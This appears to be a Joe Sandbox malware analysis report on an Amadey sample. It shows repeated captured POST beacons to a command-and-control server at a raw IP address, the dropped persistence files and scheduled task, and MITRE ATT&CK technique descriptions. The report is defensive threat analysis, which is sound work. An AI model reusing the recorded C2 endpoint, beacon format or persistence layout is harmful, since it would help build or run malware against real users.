Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 86.23.85.13.in-addr.arpa

Source: unknown	DNS traffic detected: query: 171.39.242.20.in-addr.arpa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 86.23.85.13.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
file.exe

Function 0026BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Function 00265DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00267D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00296E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 0029D4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Function 002682B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00296C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00296F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 0029D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 00276AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON